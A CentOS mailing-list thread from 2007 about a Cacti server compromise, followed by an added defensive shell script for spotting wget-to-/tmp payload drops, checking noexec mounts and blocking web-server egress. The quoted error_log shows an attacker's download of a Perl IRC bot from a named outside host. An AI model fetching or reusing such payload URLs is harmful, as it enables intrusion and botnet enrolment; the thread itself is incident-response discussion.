On Thu, 24 May 2007, Dexter Ang wrote:
> Hi folks,
>
> I'm just wondering what is the recommended way of monitoring servers and
> networks remotely. <snip>
You might want to look at hobbit. http://sourceforge.net/projects/hobbitmon/
I find it much easier to manage than nagios. Besides, the UI looks nicer. :-)
Thanks! I'll look into this.
>
> The problem is that leaving cacti open was the most stupid thing I've done.
> After checking /var/log/httpd/error_log, I saw that someone exploited a
> cacti php file and the result was:
>
> --08:13:11-- http://psaico.host.sk/desk.pl
> => `/tmp/desk.pl'
> Resolving psaico.host.sk... 62.168.109.150
> Connecting to psaico.host.sk|62.168.109.150|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 20,144 (20K) [text/x-perl]
>
> 0K .......... ......... 100% 28.26KB/s
>
> 08:13:13 (28.26 KB/s) - `/tmp/desk.pl' saved [20144/20144]
>
> which immediately downloaded ShellBOT to /tmp and executed it. It was a good
> thing I caught this as early as I did. So, what's everyone else's solution
> these days? Or is it simply a matter of creating a /tmp partition and
> mounting it noexec?
>
> On a side note... anyone with experience with ShellBOT? From research, it
> seems to attempt to connect to an IRC server upon running. So if my outgoing
> connections are secured by iptables, can I assume it never got connected at
> all? I'll probably try this out someday but just looking for a quick
> experienced answer.
It does not matter if they connected or not. The bottom line is that the machine was
hacked and something got installed that does not belong there. There is no way
at this point to be sure that they did not install something else or modify
binaries to hide their tracks.
So now the only way to be sure there is not something on that machine is to reload
it. Anything less and you will never know for sure.
Wise words. This will definitely be my next step ASAP.
dex
_______________________________________________ CentOS mailing list CentOS@xxxxxxxxxx http://lists.centos.org/mailman/listinfo/centos
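The thread raises three practical points: spotting the wget-to-/tmp drop in the httpd error_log, checking whether /tmp is really mounted noexec, and using iptables to stop a bot under the web-server uid from dialling out. The script below is an added example and is not from the original thread or from CentOS/Cacti; the log excerpt and mount table are constructed to match the shape of the quoted output, and the uid name "apache", the host "example.invalid" and the mount points are assumptions.

```shell
#!/bin/sh
# Added example (not part of the original thread). Triage helpers for the
# "web app exploited, payload fetched into /tmp" pattern. All sample data
# is constructed; uid, host and paths are assumptions.

# Constructed error_log excerpt in the same shape as wget's progress output.
SAMPLE_LOG=$(cat <<'EOF'
[Thu May 24 08:13:10 2007] [error] [client 10.0.0.5] PHP Notice: undefined index
--08:13:11-- http://example.invalid/desk.pl
=> `/tmp/desk.pl'
Resolving example.invalid... 192.0.2.10
HTTP request sent, awaiting response... 200 OK
08:13:13 (28.26 KB/s) - `/tmp/desk.pl' saved [20144/20144]
[Thu May 24 08:14:00 2007] [error] File does not exist: /var/www/html/favicon.ico
EOF
)

# Constructed /proc/mounts lines: /tmp on its own partition with noexec,
# /var/tmp left on the root filesystem.
SAMPLE_MOUNTS=$(cat <<'EOF'
/dev/sda1 / ext3 rw 0 0
/dev/sda3 /tmp ext3 rw,noexec,nosuid,nodev 0 0
EOF
)

# Print the remote URLs wget reported fetching ("--HH:MM:SS-- URL" lines).
find_fetch_urls() {
    sed -n 's/^--[0-9:]*-- *\(http[^ ]*\).*$/\1/p'
}

# Print the local paths wget reported as saved ("... - `/path' saved [n/n]").
find_dropped_files() {
    sed -n "s/^.* - \`\([^']*\)' saved \[.*$/\1/p"
}

# Exit 0 if the mount point in $1 carries the noexec option in the
# /proc/mounts-style table read from stdin, else exit 1.
mount_has_noexec() {
    awk -v mp="$1" '
        $2 == mp { n = split($4, o, ","); for (i = 1; i <= n; i++) if (o[i] == "noexec") found = 1 }
        END { exit found ? 0 : 1 }'
}

# Emit iptables rules for the OUTPUT chain that let the web-server uid ($1)
# answer its clients (ESTABLISHED,RELATED) but log and reject any new
# connection it tries to open, which is what a downloaded IRC bot would do.
egress_rules() {
    uid="$1"
    printf '%s\n' \
      "iptables -A OUTPUT -m owner --uid-owner $uid -m state --state ESTABLISHED,RELATED -j ACCEPT" \
      "iptables -A OUTPUT -m owner --uid-owner $uid -j LOG --log-prefix \"egress-$uid: \"" \
      "iptables -A OUTPUT -m owner --uid-owner $uid -j REJECT"
}

# Stand-alone run: report what the helpers find in the constructed samples.
printf '%s\n' "$SAMPLE_LOG" | find_fetch_urls
printf '%s\n' "$SAMPLE_LOG" | find_dropped_files
if printf '%s\n' "$SAMPLE_MOUNTS" | mount_has_noexec /tmp; then echo "/tmp is noexec"; fi
egress_rules apache
```

Two caveats when applying this. A noexec /tmp stops `/tmp/desk.pl` from being run directly, but `perl /tmp/desk.pl` still works because the interpreter, not the kernel, opens the file, so treat it as a speed bump rather than a control. The egress rules only answer "did the bot connect?" if the LOG rule was in place before the compromise; if the Cacti poller runs under the same uid as httpd, add explicit ACCEPT rules for its SNMP targets ahead of the REJECT.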